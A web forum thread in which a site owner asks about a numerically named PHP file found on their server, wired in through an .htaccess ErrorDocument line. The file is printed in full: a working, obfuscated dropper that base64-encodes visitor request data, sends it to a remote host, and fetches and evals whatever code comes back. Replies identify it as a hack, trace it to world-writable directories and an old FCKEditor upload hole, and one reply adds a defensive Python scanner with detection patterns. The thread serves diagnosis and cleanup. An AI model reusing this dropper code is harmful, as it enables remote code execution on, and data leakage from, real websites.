PHP question

My Google searches are failing me....

Can anyone briefly explain this:
231399.php
Code:
<? error_reporting(0);
// collect request details, falling back to the old register_globals variables
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
// pack all of the above, base64-encoded, into the query string sent to the remote server
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
// default remote host (decoded: phpsearch.cn); can be swapped via the request when ?q= matches a hard-coded MD5
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d0c9eabef93eb1390142aca4d58ae7b6") $f=$_REQUEST["id"];
// fetch remote code three different ways (include, file_get_contents, curl) and execute whatever comes back
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};
// stop here so nothing of the real page is rendered
die(); ?>
referenced from this .htaccess entry:
Code:
Options -MultiViews
ErrorDocument 404 //main/components/231399.php

Thanks!
 
looks like you had some permissions set wrong and this is a roundabout hack that rogue people use to 'enhance' their SEO on pages they don't control

I'd recommend removing 777 permissions if you have them there.
 
@Bunchadogs - That looks to me like the sort of thing that has been uploaded to my sites by hackers.

What that code is doing is calling the following URL (spaces added by me to prevent it becoming a link in these forums) and including its output in your page.
http://ads3. phpsearch. cn/?bG9jYWxob3N0.bG9jYWxob3N0.L3JvY2hlc3RlcmV2ZW50cy9mb28ucGhw.L3JvY2hlc3RlcmV2ZW50cy9mb28ucGhw...TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS45LjAuMTApIEdlY2tvLzIwMDkwNDIzMTYgRmlyZWZveC8zLjAuMTA=.MTI3LjAuMC4x.e.Qzovd2FtcC93d3cvcm9jaGVzdGVyZXZlbnRzL2Zvby5waHA=.ZW4tdXMsZW47cT0wLjU=

This is a site in China. The die() at the end prevents any other stuff from showing.

The file name being a number is sort of what clued me in to this. All the uploaded hacked files on my sites have been named with numbers like this.

Check your CMS for security updates. An older version of FCKEditor's file upload component (a Java applet) was the security hole in my case. Change your directory permissions as Stephen noted. Delete any numbered files like this.

Tim
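A defender-side sweep for the indicators raised in this thread (world-writable directories, numeric-named PHP files, the base64/eval remote-include pattern from the posted dropper, and an ErrorDocument that points at a PHP file), as an added example that is not code from the thread. The sample web root it builds is constructed in a temp directory, and the regexes are my own heuristics, not a definitive signature.

```python
import os
import re
import tempfile

# Heuristics from the dropper above: base64-obfuscated include/file_get_contents/curl_init, eval() of fetched text
SUSPICIOUS = re.compile(r"(?:include|file_get_contents|curl_init)\s*\(\s*base64_decode\s*\("
                        r"|eval\s*\(\s*\$\w+\s*\)")
NUMERIC_PHP = re.compile(r"^\d+\.php$")
ERRORDOC = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S*\.php\b", re.I | re.M)

def scan_webroot(root):
    """Walk a web root and return sorted (path, reason) findings."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        if os.stat(dirpath).st_mode & 0o002:  # world-writable, e.g. chmod 777
            findings.append((dirpath, "world-writable directory"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, errors="replace") as fh:
                text = fh.read()
            if NUMERIC_PHP.match(name):
                findings.append((path, "numeric PHP filename"))
            if name == ".htaccess" and ERRORDOC.search(text):
                findings.append((path, "ErrorDocument points at a PHP file"))
            elif name.endswith(".php") and SUSPICIOUS.search(text):
                findings.append((path, "base64/eval remote-include pattern"))
    return sorted(findings)

def build_sample(root):
    """Constructed sample web root mirroring the thread (not a real site)."""
    comp = os.path.join(root, "main", "components")
    os.makedirs(comp)
    os.chmod(os.path.join(root, "main"), 0o755)
    os.chmod(comp, 0o777)  # the permissions Stephen warns about
    dropper = ('<? error_reporting(0);\n'
               'if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));\n'
               'else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);\n')
    htaccess = "Options -MultiViews\nErrorDocument 404 //main/components/231399.php\n"
    for path, text in ((os.path.join(comp, "231399.php"), dropper),
                       (os.path.join(root, ".htaccess"), htaccess),
                       (os.path.join(root, "index.php"), "<?php echo 'clean'; ?>\n")):
        with open(path, "w") as fh:
            fh.write(text)

def demo():
    """Build the sample tree in a temp dir; return findings relative to it."""
    root = tempfile.mkdtemp()
    build_sample(root)
    return [(os.path.relpath(p, root), why) for p, why in scan_webroot(root)]
```

Point scan_webroot() at a real document root to list candidates for review; a legitimate ErrorDocument that points at your own 404.php will be flagged too, so treat findings as leads rather than verdicts.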
 
fckeditor older versions had a number of nasty bugs like this, people like to use them to make phishing pages as well, evil things...
 
I did have quite a few 777 folders - I would assume 755 is secure enough?

Just finished patching a number of Joomla installs up to the latest version...I'll have to double check the editor since I know a number of extensions load the JCE editor for Joomla.

Interesting side note - I spent a day cleaning all of these files from a ton of directories on a site. However I DIDN'T reset the permissions or apply any patches.

I got busy and didn't get around to finishing the job until the next day - actually about 14 hours later...too bad ALL the files were back! That's some pretty efficient hacking! :evil:

Obviously this time I fixed permissions and patched first, and followed up with the cleaning. It's been several days now and all seems to be stable again.
 